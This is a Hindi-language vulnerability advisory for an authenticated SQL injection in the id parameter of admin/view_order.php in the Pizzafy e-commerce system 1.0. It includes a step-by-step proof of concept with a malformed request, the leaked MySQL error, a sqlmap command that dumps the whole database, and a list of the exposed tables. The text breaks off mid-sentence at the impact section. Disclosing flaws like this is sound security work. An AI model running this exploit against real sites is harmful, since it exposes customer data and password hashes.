
admin/view_order.php| फ़ील्ड | मान |
|---|---|
| विक्रेता | SourceCodester |
| उत्पाद | PHP और MySQL का उपयोग करने वाला Pizzafy ई-कॉमर्स सिस्टम |
| संस्करण | 1.0 |
| भेद्यता | SQL इंजेक्शन |
| CWE | CWE-89 |
| CVSSv3 स्कोर | 7.2 (उच्च) |
| हमला वेक्टर | नेटवर्क |
| प्रमाणीकरण आवश्यक | हाँ (व्यवस्थापक) |
| शोधकर्ता | Xmyronn |
| दिनांक | 2026-04-11 |
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
फ़ाइल: Pizzafy/admin/view_order.php
पैरामीटर: id (GET)
Pizzafy ई-कॉमर्स सिस्टम 1.0 में admin/view_order.php एंडपॉइंट, id GET पैरामीटर को MySQL क्वेरी में भेजने से पहले उसे ठीक से सैनिटाइज़ नहीं करता है। एक प्रमाणित व्यवस्थापक इस पैरामीटर में हेरफेर करके मनमाना SQL इंजेक्ट कर सकता है, जिससे पूर्ण डेटाबेस से समझौता हो सकता है।
यहाँ जाएँ:
http://localhost/pizzafy/Pizzafy/admin/index.php
व्यवस्थापक क्रेडेंशियल से लॉगिन करें।
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
किसी भी ऑर्डर प्रविष्टि पर View Order पर क्लिक करें।

इंटरसेप्ट किया गया GET अनुरोध इस प्रकार दिखता है:

id=1 को id=' में बदलें:

GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1
प्रतिक्रिया — MySQL त्रुटि उजागर हुई:
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15
अनुरोध को view_order.txt में सहेजें और चलाएँ:
sqlmap -r view_order.txt --dump --batch
sqlmap द्वारा पुष्टि किए गए इंजेक्शन प्रकार:
| प्रकार | शीर्षक |
|---|---|
| Boolean-based blind | AND boolean-based blind — WHERE clause |
| Error-based | MySQL >= 5.0 FLOOR error-based |
| Time-based blind | MySQL >= 5.0.12 SLEEP |
| UNION query | Generic UNION query — 11 columns |
पूर्ण डेटाबेस डंप किया गया:
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings
उजागर हुई संवेदनशील डेटा में bcrypt पासवर्ड हैश, ग्राहक ईमेल, ऑर्डर विवरण और सिस्टम कॉन्फ़िगरेशन शामिल हैं।
एक दुर्भावनापूर्ण प्रमाणित व्यवस्थापक (या वह हमलावर जिसने व्यवस्थापक क्रेडेंशियल प्राप्त कर लिए हैं) निम्न कार्य कर सकता है: